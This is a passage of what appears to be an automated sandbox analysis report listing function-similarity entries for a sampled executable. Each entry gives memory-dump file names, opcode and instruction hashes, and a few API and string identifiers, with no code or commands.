• Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
• Instruction Fuzzy Hash: F9E1D83290864682EB68BF25A15013DB362FF55F64F940135DA8E27BD4DFA9D8E1C730
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: incorrect header check$invalid window size
• API String ID: 0-900081337
• Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
• Instruction ID: e6d39984e9073f2c67297d79cd024b3718a18c70b45ad2c1199280f0a99b1e66
• Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
• Instruction Fuzzy Hash: EE91CE72A142C687E7A49F15C448B3E76BAFF44360F554139DA8A66BC0CB7CE940CB74
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
• Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
• Instruction ID: 2d931b8738c7dcea525e7aafa58621bd142f8c9d5c69d5f69a19852614db9800
• Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
• Instruction Fuzzy Hash: 98516822B182C186E724EE35E801769AB92E744FA4F888231CBD857FC5CFBDE444C720
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
• Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction ID: 3de00cff6746158e9195a629f369a24f3d7b39f06c276904fb8450a2a63340d0
• Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction Fuzzy Hash: 09A16666A087C586EB21EF25F0007A9BBD6AB61BE4F448431DE8D57B81DFBDE501C320
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
• Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
• Instruction ID: 1f3bb686ad016479f005182e976b734015af3b2fec2391572f8e3e108b66157e
• Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
• Instruction Fuzzy Hash: FA51AF01F1864281FA64BE2A690517AD2926F84FA4FD84135DE8D67FD2EFBCE841D331
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
• Instruction ID: 7d75a20b5839b5ed1ec0eb6573543cc9f70e8a0c263ae2def4ff9824eb7e6965
• Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
• Instruction Fuzzy Hash: 99B09220E07A42C2EA483F216CD222862A6BF48720FD80138C08CA1730DE6C20F6D731
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction ID: ea9cefe46bc0e6e55c52b789e7a541cfa6c101bcdad13037bc8083d2049923d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED1ED62A0864285E728BE25A05027DA3A2FF45F68F944235CD8D27F94DFBDD4E1C770
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction ID: c8ba1d80044e538955e031d33335f0db7859189e2c684a5c9cc589dc724fcc13
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DC17E762181E08BD289EB29E46947A73E1F78930DBD5406BEF8747BC5CB3CA514DB20
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction ID: 3a16abfd66b23a14759b55191d016db9a1dc3f5558686d518cbf6d00e0ada24f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAB1BE7290878185E764AF39E05023CBBA2E749F68FA44136CB8D67B95CFB9D481C770
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction ID: 263a0dfd98e0d6dd6340469046f230dec079d0654fddf61431a0ad7f88981e52
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA81D372A0878146E774FF19A44037AAA92FB45BA4F944235DACD53F99DF7CD404CB20
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction ID: 8d8bd969dcd2cf3256bdba054634b27ed09a0ca92cd0dfc44671d3ac4dace0de
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A861F522E0C29286F764AE28945463DE6C2AF40774FA50239D79D66FD4DEEDE840C732
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: 426172d2f474b894824707cddb41c51c367a285f5d960804c288c3d91b7dd66c
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: A8516572A1865186E724AF29E08023873A2EB54F78F644131CEDD67BD4CF7AE843C760
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction ID: 388ba2b029977c870600f19a5fe41a3321c9af4746bb6b4d27a55f1b94cf512d
• Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction Fuzzy Hash: D7516636A1465186E724AF2DE0402387362EB44F78F644172CACD67B94DB7AE843C770
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 4c30e29213f99a15cb40839f3da725f714fea962e2418835500f1e8dbaf8f85a
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: 84518C36A1465285E724AF2DE04023877A2EB44F78F644172DECD27B94CBB9E843C7A0
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: e8f19f72f06d1ce7effd6d77ed4e74598d4b7422c175899c9ead71cdd42e1610
• Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction Fuzzy Hash: 28519636A18651C5E724AF2DE04023867A2EB45F68FA44172CE8D27B94CF7EE843D770
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: 10a30073f4d182076d75434423e0387c8b64d6f416e3e7b0f123b1beb6d77462
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: BC519936A1869185E724AF29E44023877A2FB55F68F644131CF8D27B98CF7AEC42C770
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: 24c29f6969e8fcc736a565e5149d9df4161a7ed3c38ee2e3367cfb93ad7c9a51
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 7B518736A1865185E724AF2DE05023CA7A2EB44F68F645172CECD67B94CF7AE843C770
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction ID: 005ea874bbb6d9311b5f20e8b3996d334d470c61b55fb5ee007b5dd3aee00e84
• Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction Fuzzy Hash: 2241C66280978A44F965BD3819046B8E682DF22FB0DD812F0DDD973BD2DF8C2986C171
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction ID: abeacb111e894366aa60b87f059ba1fae5953056e90edd1bfd360b0f05b37e01
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C410322714A9482EF04EF2AE914169B3A2BB48FE4B899437DE4DA7F54EF7CC451C310
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction ID: ddf653c4c20090707462923c6116c6c555012c4835dc6013f5b92bbcaab8c869
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D831C432B18B4281E754BF25744013DA696AF84BA0F944238EADD63FD5DF7CD801D324
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
